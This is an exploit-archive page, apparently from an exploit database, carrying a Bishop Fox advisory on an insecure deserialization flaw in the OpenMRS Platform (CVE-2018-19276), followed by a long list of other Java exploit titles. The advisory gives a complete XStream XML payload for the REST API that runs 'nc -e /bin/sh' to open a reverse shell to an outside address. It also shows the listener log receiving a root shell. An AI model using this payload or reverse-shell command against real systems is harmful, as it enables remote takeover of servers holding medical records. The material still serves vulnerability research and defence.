Menu

"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization"

Author

"Bishop Fox"

Platform

java

Release date

2019-02-05

Release Date Title Type Platform Author
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"
2019-01-28 "Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-10-24 "Apache OFBiz 16.11.04 - XML External Entity Injection" webapps java "Jamie Parfet"
2018-10-22 "Oracle Siebel CRM 8.1.1 - CSV Injection" webapps java "Sarath Nair"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-10-01 "H2 Database 1.4.196 - Remote Code Execution" webapps java h4ckNinja
2018-09-27 "ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-08-06 "Wavemaker Studio 6.6 - Server-Side Request Forgery" webapps java "Gionathan Reale"
2018-08-06 "LAMS < 3.1 - Cross-Site Scripting" webapps java "Nikola Kojic"
2018-07-16 "Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection" webapps java alt3kx
2018-07-04 "ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution" webapps java "Kacper Szurek"
2018-06-20 "MaDDash 2.0.2 - Directory Listing" webapps java ManhNho
2018-06-26 "Liferay Portal < 7.0.4 - Server-Side Request Forgery" webapps java "Mehmet Ince"
2018-06-04 "SearchBlox 8.6.7 - XML External Entity Injection" webapps java "Ahmet Gurel"
2018-05-30 "SearchBlox 8.6.6 - Cross-Site Request Forgery" webapps java "Ahmet Gurel"
2018-05-22 "ERPnext 11 - Cross-Site Scripting" webapps java "Veerababu Penugonda"
2018-05-21 "ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting" webapps java "Ahmet Gurel"
2018-05-21 "GitBucket 4.23.1 - Remote Code Execution" webapps java "Kacper Szurek"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-05-10 "ModbusPal 1.6b - XML External Entity Injection" webapps java "Trent Gordon"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-15 "Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution" webapps java "Antonio Francesco Sardella"
2018-03-07 "antMan 0.9.0c - Authentication Bypass" webapps java "Joshua Bowser"
2017-05-17 "Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity" webapps java "Charles Fol"
2018-03-12 "ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)" webapps java "Mehmet Ince"
2017-08-22 "Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write" webapps java LiquidWorm
2017-07-24 "ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)" webapps java "Kacper Szurek"
2017-05-19 "ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass" webapps java ByteM3
2017-05-19 "Oracle PeopleSoft - Server-Side Request Forgery" webapps java ERPScan
2017-05-03 "Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change" webapps java LiquidWorm
2017-05-03 "Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure" webapps java LiquidWorm
2017-08-22 "Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution" webapps java LiquidWorm
2018-02-12 "LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution" webapps java LiquidWorm
2018-02-12 "LogicalDOC Enterprise 7.7.4 - User Enumeration" webapps java LiquidWorm
2018-02-12 "LogicalDOC Enterprise 7.7.4 - Directory Traversal" webapps java LiquidWorm
2017-02-21 "Grails PDF Plugin 0.6 - XML External Entity Injection" webapps java "Charles Fol"
2017-01-08 "ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities" webapps java "Mehmet Ince"
2017-01-09 "Blackboard LMS 9.1 SP14 - Cross-Site Scripting" webapps java Vulnerability-Lab
2016-11-28 "Red Hat JBoss EAP - Deserialization of Untrusted Data" webapps java "Mediaservice.net Srl."
2016-11-21 "Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal" webapps java "Julien Ahrens"
2016-10-18 "ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure" webapps java p0z
2018-01-21 "Oracle JDeveloper 11.1.x/12.x - Directory Traversal" webapps java hyp3rlinx
2018-01-18 "Primefaces 5.x - Remote Code Execution (Metasploit)" webapps java "Bjoern Schuette"
2018-01-15 "Oracle PeopleSoft 8.5x - Remote Code Execution" webapps java "Vahagn Vardanyan"
2016-08-22 "Sakai 10.7 - Multiple Vulnerabilities" webapps java LiquidWorm
2016-08-11 "ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal" webapps java Rv3Laboratory
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-06-21 "SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal" webapps java ERPScan
2016-06-21 "SAP NetWeaver AS JAVA 7.1 < 7.5 - 'ctcprotocol Servlet' XML External Entity" webapps java ERPScan
2016-06-06 "Apache Continuum 1.4.2 - Multiple Vulnerabilities" webapps java "David Shanahan"
2016-05-17 "SAP xMII 15.0 - Directory Traversal" webapps java ERPScan
2016-04-21 "Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)" webapps java "Fakhir Karim Reda"
2016-02-22 "BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities" webapps java Security-Assessment.com
2016-02-08 "Solr 3.5.0 - Arbitrary Data Deletion" webapps java N37
2016-02-01 "Hippo CMS 10.1 - Multiple Vulnerabilities" webapps java LiquidWorm
2014-06-12 "Yealink VoIP Phones - '/servlet' HTTP Response Splitting" webapps java "Jesus Oquendo"
2016-01-15 "GlassFish Server - Arbitrary File Read" webapps java bingbing
2016-01-07 "OpenMRS Reporting Module 0.9.7 - Remote Code Execution" webapps java "Brian D. Hysell"
2016-09-28 "Symantec Messaging Gateway 10.6.1 - Directory Traversal" webapps java R-73eN
2013-08-23 "SearchBlox - Multiple Information Disclosure Vulnerabilities" webapps java "Ricky Roane Jr"
2015-11-10 "Jenkins 1.633 - Credential Recovery" webapps java "The Repo"
2015-10-28 "JIRA and HipChat for JIRA Plugin - Velocity Template Injection" webapps java "Chris Wood"
2013-04-10 "Hero Framework - '/users/forgot_password?error' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/login?Username' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-03-04 "HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting" webapps java "Julien Ahrens"
2012-12-13 "N-able N-central - Cross-Site Request Forgery" webapps java Cartel
2015-08-28 "Jenkins 1.626 - Cross-Site Request Forgery / Code Execution" webapps java smash
2012-08-08 "ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities" webapps java "Matthew Joyce"
2012-08-01 "ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injections" webapps java "Ibrahim El-Sayed"
2012-08-01 "ManageEngine Applications Manager - Multiple SQL Injections" webapps java "Ibrahim El-Sayed"
2012-06-14 "Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities" webapps java "Nadeem Salim"
2012-06-11 "BMC Identity Management - Cross-Site Request Forgery" webapps java "Travis Lee"
2015-05-26 "Apache JackRabbit - WebDAV XML External Entity" webapps java "Mikhail Egorov"
2012-04-02 "JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting" webapps java "Dawid Golak"
2012-04-01 "ManageEngine Firewall Analyzer 7.2 - 'fw/syslogViewer.do?port' Cross-Site Scripting" webapps java "Vulnerability Research Laboratory"
2012-04-01 "ManageEngine Firewall Analyzer 7.2 - 'fw/mindex.do?url' Cross-Site Scripting" webapps java "Vulnerability Research Laboratory"
2012-04-01 "ManageEngine Firewall Analyzer 7.2 - 'fw/createAnomaly.do?subTab' Cross-Site Scripting" webapps java "Vulnerability Research Laboratory"
2012-04-01 "ManageEngine Firewall Analyzer 7.2 - '/fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities" webapps java "Vulnerability Research Laboratory"
2012-03-23 "Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload" webapps java voidloafer
2012-03-21 "Minify 2.1.x - 'g' Cross-Site Scripting" webapps java "Ayoub Aboukir"
2012-03-11 "EJBCA 4.0.7 - 'issuer' Cross-Site Scripting" webapps java MustLive
2012-03-18 "JavaBB 0.99 - 'userId' Cross-Site Scripting" webapps java sonyy
2012-02-10 "LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities" webapps java anonymous
2012-02-07 "ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Cross-Site Scripting" webapps java LiquidWorm
2012-02-07 "ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Cross-Site Scripting" webapps java LiquidWorm
2015-03-30 "JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution" webapps java ikki
2012-01-13 "Contus Job Portal - 'Category' SQL Injection" webapps java Lazmania61
2015-03-19 "EMC M&R (Watch4net) - Directory Traversal" webapps java "Han Sahin"
2015-03-19 "EMC M&R (Watch4net) - Credential Disclosure" webapps java "Han Sahin"
2015-03-18 "Websense Appliance Manager - Command Injection" webapps java "Han Sahin"
2011-11-11 "Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities" webapps java "Jose Carlos de Arriba"
2011-11-07 "Oracle NoSQL 11g 1.1.100 R2 - 'log' Directory Traversal" webapps java Buherátor
2011-05-18 "CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal" webapps java "Sense of Security"
2011-05-02 "LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting" webapps java "Patrick Webster"
2016-11-22 "AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting" webapps java "Julien Ahrens"
2009-12-17 "jCore - 'search' Cross-Site Scripting" webapps java loneferret
2010-07-12 "dotDefender 4.02 - 'clave' Cross-Site Scripting" webapps java "David K"
2010-07-11 "Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting" webapps java 10n1z3d
2009-01-08 "PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting" webapps java "Patrick Webster"
2010-02-06 "ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting" webapps java cp77fk4r
2010-03-02 "Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities" webapps java "Yaniv Miron"
2009-10-14 "Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting" webapps java "Michele Orru"
2009-06-08 "Computer Associates SiteMinder - Unicode Cross-Site Scripting Protection Security Bypass" webapps java "Arshan Dabirsiaghi"
2009-09-23 "IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting" webapps java IBM
2009-05-19 "DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting" webapps java r0t
2009-04-21 "Sun Java System Delegated Administrator 6.x - HTTP Response Splitting" webapps java "SCS team"
2009-04-16 "BlackBerry Enterprise Server 4.0/4.1 - MDS Connection Service Cross-Site Scripting" webapps java "Ken Millar"
2009-04-15 "Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities" webapps java "Michael Kirchner"
2009-04-09 "Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection" webapps java "Usman Saeed"
2009-05-20 "Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting" webapps java "SCS team"
2009-05-20 "Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting" webapps java "SCS team"
2009-03-31 "Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting" webapps java "SCS team"
2009-03-17 "Sun Java System Messenger Express 6.3-0.15 - 'error' Cross-Site Scripting" webapps java syniack
2009-02-26 "APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting" webapps java "Digital Security Research Group"
2009-02-25 "JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting" webapps java "Digital Security Research Group"
2008-11-09 "MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure" webapps java "Xia Shing Zee"
2008-10-05 "VeriSign Kontiki Delivery Management System 5.0 - 'action' Cross-Site Scripting" webapps java "Mazin Faour"
2008-10-01 "Celoxis - Multiple Cross-Site Scripting Vulnerabilities" webapps java teuquooch1seero
2008-05-21 "SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting" webapps java DSecRG
2008-04-14 "Business Objects Infoview - 'cms' Cross-Site Scripting" webapps java "Sebastien gioria"
2008-04-07 "Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting" webapps java syniack
2008-03-19 "IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps java sasquatch
2008-02-13 "Cisco Unified Communications Manager 6.1 - 'key' SQL Injection" webapps java "Nico Leidecker"
2008-01-29 "SunGard Banner Student 7.3 - 'add1' Cross-Site Scripting" webapps java "Brendan M. Hickey"
2007-10-15 "Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting" webapps java JosS
2007-08-21 "ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting" webapps java MustLive
2007-07-04 "OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities" webapps java Lostmon
2007-07-04 "OpManager 6/7 - 'admin/ServiceConfiguration.do?Operation' Cross-Site Scripting" webapps java Lostmon
2007-07-04 "OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities" webapps java Lostmon
2007-07-04 "OpManager 6/7 - 'traceRoute.do?name' Cross-Site Scripting" webapps java Lostmon
2007-07-04 "OpManager 6/7 - 'ping.do?name' Cross-Site Scripting" webapps java Lostmon
2013-11-30 "Ametys CMS 3.5.2 - 'lang' XPath Injection" webapps java LiquidWorm
2006-06-27 "H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities" webapps java r0t
2006-05-16 "Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure" webapps java "Joseph Pierini"
2005-12-27 "FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps java r0t3d3Vil
2005-07-15 "Novell Groupwise 6.5 Webaccess - HTML Injection" webapps java "Francisco Amato"
2005-05-24 "Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities" webapps java "Ricky Latt"
2013-03-15 "Open-Xchange Server 6 - Multiple Vulnerabilities" webapps java "Martin Braun"
2004-06-11 "PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting" webapps java "Janek Vind"
2003-10-21 "Vivisimo Clustering Engine - Search Script Cross-Site Scripting" webapps java ComSec
2003-06-09 "H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting" webapps java "Lorenzo Hernandez Garcia-Hierro"
2002-10-18 "vBulletin 2.0/2.2.x - Cross-Site Scripting" webapps java Sp.IC
2002-09-30 "Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal" webapps java "ET LoWNOISE"
2002-06-17 "Wolfram Research webMathematica 4.0 - File Disclosure" webapps java "Andrew Badr"
2002-06-13 "Ruslan Communications <Body>Builder - Authentication Bypass" webapps java "Alexander Korchagin"
2001-06-13 "SiteWare 2.5/3.0/3.1 Editor Desktop - Directory Traversal" webapps java "Foundstone Labs"
2012-08-20 "hupa webmail 0.0.2 - Persistent Cross-Site Scripting" webapps java "Shai rod"
2012-05-13 "Liferay Portal 6.0.x < 6.1 - Privilege Escalation" webapps java "Jelmer Kuperus"
2012-02-17 "JaWiki - 'versionNo' Cross-Site Scripting" webapps java sonyy
2018-09-17 "CA Release Automation NiMi 6.5 - Remote Command Execution" remote java "Jakub Palaczynski"
2018-07-13 "Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)" remote java Metasploit
2017-10-17 "Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)" remote java Metasploit
2017-09-27 "Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution" remote java SlidingWindow
2017-09-13 "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-07-30 "Jenkins < 1.650 - Java Deserialization" remote java "Janusz Piechówka"
2017-06-29 "ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)" remote java Metasploit
2017-09-19 "HPE < 7.2 - Java Deserialization" remote java "Raphael Kuhn"
2017-02-15 "OpenText Documentum D2 - Remote Code Execution" remote java "Andrey B. Panfilov"
2016-05-25 "PowerFolder Server 10.4.321 - Remote Code Execution" remote java "Hans-Martin Muench"
2016-05-25 "Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)" remote java Metasploit
2016-03-31 "Apache Jetspeed - Arbitrary File Upload (Metasploit)" remote java Metasploit
2015-12-16 "FireEye - Wormable Remote Code Execution in MIP JAR Analysis" remote java "Tavis Ormandy & Natalie Silvanovich"
2015-12-15 "Jenkins CLI - RMI Java Deserialization (Metasploit)" remote java Metasploit
2015-09-17 "ManageEngine OpManager - Remote Code Execution (Metasploit)" remote java Metasploit
2015-07-21 "SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)" remote java Metasploit
2015-05-08 "Novell ZENworks Configuration Management - Arbitrary File Upload (Metasploit)" remote java Metasploit
2015-03-16 "ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)" remote java Metasploit
2015-02-17 "Java JMX - Server Insecure Configuration Java Code Execution (Metasploit)" remote java Metasploit
2015-01-20 "ManageEngine (Multiple Products) - (Authenticated) Arbitrary File Upload (Metasploit)" remote java Metasploit
2015-01-13 "Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)" remote java Metasploit
2014-11-10 "Visual Mining NetCharts Server - Remote Code Execution (Metasploit)" remote java Metasploit
2014-10-02 "ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)" remote java "Pedro Ribeiro"
2014-09-15 "SolarWinds Storage Manager - Authentication Bypass (Metasploit)" remote java Metasploit
2014-06-27 "HP AutoPass License Server - Arbitrary File Upload (Metasploit)" remote java Metasploit
2014-05-30 "ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)" remote java Metasploit
2014-02-05 "Apache Struts - Developer Mode OGNL Execution (Metasploit)" remote java Metasploit
2007-08-15 "Sun Java Runtime Environment 1.4.2 - Font Parsing Privilege Escalation" remote java "John Heasman"
2013-12-03 "Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)" remote java Metasploit
2013-11-27 "Apache Roller - OGNL Injection (Metasploit)" remote java Metasploit
2006-10-31 "Sun Java System 6.x - Messenger Express Cross-Site Scripting" remote java Handrix
2013-01-24 "Java Applet - AverageRangeStatisticImpl Remote Code Execution (Metasploit)" remote java Metasploit
2013-01-11 "Java Applet JMX - Remote Code Execution (Metasploit) (1)" remote java Metasploit
2012-10-10 "Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)" remote java Metasploit
2012-08-27 "Java 7 Applet - Remote Code Execution (Metasploit)" remote java Metasploit
2012-08-15 "Novell ZENworks Asset Management - Remote Execution (Metasploit)" remote java Metasploit
2012-07-11 "Java Applet - Field Bytecode Verifier Cache Remote Code Execution (Metasploit)" remote java Metasploit
2018-04-09 "H2 Database - 'Alias' Arbitrary Code Execution" local java gambler
2017-05-05 "CloudBees Jenkins 2.32.1 - Java Deserialization" dos java SecuriTeam
2009-03-31 "Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service" dos java "SCS team"
2006-05-15 "Sun Java Applet - Font.createFont Remote Denial of Service" dos java "Marc Schoenefeld"
Release Date Title Type Platform Author
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"

Unfortunately we've not tracked down any possible victims.

Ads

Insecure Object Deserialization on the OpenMRS Platform
Vulnerability Details
CVE ID: CVE-2018-19276

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-502

CVSS Base Score: 10.0 

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

JAVA 8 ENVIRONMENT
By injecting an XML payload in the following body request to the REST API provided by the application, an attacker could execute arbitrary commands on the remote system. The request below could be used to exploit the vulnerability:


POST /openmrs/ws/rest/v1/xxxxxx HTTP/1.1
Host: HOST
Content-Type: text/xml

<map>
 <entry>
   <jdk.nashorn.internal.objects.NativeString>
     <flags>0</flags>
     <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
       <dataHandler>
         <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
           <is class="javax.crypto.CipherInputStream">
             <cipher class="javax.crypto.NullCipher">
               <initialized>false</initialized>
               <opmode>0</opmode>
               <serviceIterator class="javax.imageio.spi.FilterIterator">
                 <iter class="javax.imageio.spi.FilterIterator">
                   <iter class="java.util.Collections$EmptyIterator"/>
                   <next class="java.lang.ProcessBuilder">
                     <command>
                       <string>/bin/sh</string>
                       <string>-c</string>
                       <string>nc -e /bin/sh 172.16.32.3 8000</string>
                     </command>
                     <redirectErrorStream>false</redirectErrorStream>
                   </next>
                 </iter>
                 <filter class="javax.imageio.ImageIO$ContainsFilter">
                   <method>
                     <class>java.lang.ProcessBuilder</class>
                     <name>start</name>
                     <parameter-types/>
                   </method>
                   <name>foo</name>
                 </filter>
                 <next class="string">foo</next>
               </serviceIterator>
               <lock/>
             </cipher>
             <input class="java.lang.ProcessBuilder$NullInputStream"/>
             <ibuffer></ibuffer>
             <done>false</done>
             <ostart>0</ostart>
             <ofinish>0</ofinish>
             <closed>false</closed>
           </is>
           <consumed>false</consumed>
         </dataSource>
         <transferFlavors/>
       </dataHandler>
       <dataLen>0</dataLen>
     </value>
   </jdk.nashorn.internal.objects.NativeString>
   <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
 </entry>
 <entry>
   <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
 </entry>

The payload above was generated with the marshalsec tool and adapted to use multiple arguments because the original payload would not work well if the attacker need to send several arguments to a Linux host.. After the payload was sent, the handler successfully received a response:

~ » nc -vlp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 172.16.32.2.
Ncat: Connection from 172.16.32.2:52434.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat


The response should contain an error message similar to the one below:


{"error":{"message":"[Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service
omitted for brevity


The response above showed that the REST Web Services module was unable to process the request properly. However, the payload was deserialized before it is caught by the exception handler, which allowed the team to gain shell access.